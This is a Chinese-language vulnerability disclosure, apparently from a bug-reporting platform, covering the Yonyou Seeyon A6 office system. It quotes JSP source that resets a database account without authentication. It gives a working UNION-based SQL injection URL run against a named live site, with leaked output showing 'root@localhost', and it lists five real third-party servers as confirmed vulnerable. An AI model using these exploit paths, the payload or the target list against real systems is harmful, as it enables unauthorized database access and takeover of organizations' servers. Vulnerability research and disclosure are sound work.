用友致远A6协同系统敏感信息泄露&SQL注射

### 简要描述： 用友致远A6协同系统敏感信息泄露&SQL注射，union可shell ### 详细说明： #1重置数据库账号密码漏洞 ``` /yyoa/ext/byoa/start.jsp ``` 该文件的代码为： ``` <% Connection conn = null; PreparedStatement pstmt = null; String sql = "create user byoa IDENTIFIED by 'byoa'"; try { conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection(); pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); sql = "grant all on *.* to byoa"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "update mysql.user set password=password('byoa') where user='byoa'"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "flush privileges"; pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); pstmt.close(); //conn.close(); } catch (Exception ex) { out.println(ex.getMessage()); } %> ``` 可以看出该文件没有验证任何权限，便进行了重置数据库用户byoa的密码为： byoa #2 mysql+jsp注射 ``` /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp ``` 测试方法 ``` http://www.ssepec.net/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23 {'success':false,'errors':'root@localhost'} ``` ### 漏洞证明： 5个案例： http://www.ssepec.net http://oa.wnq.com.cn http://110.167.194.10:8081 http://qudao.seeyon.com http://www.gykghn.com:8080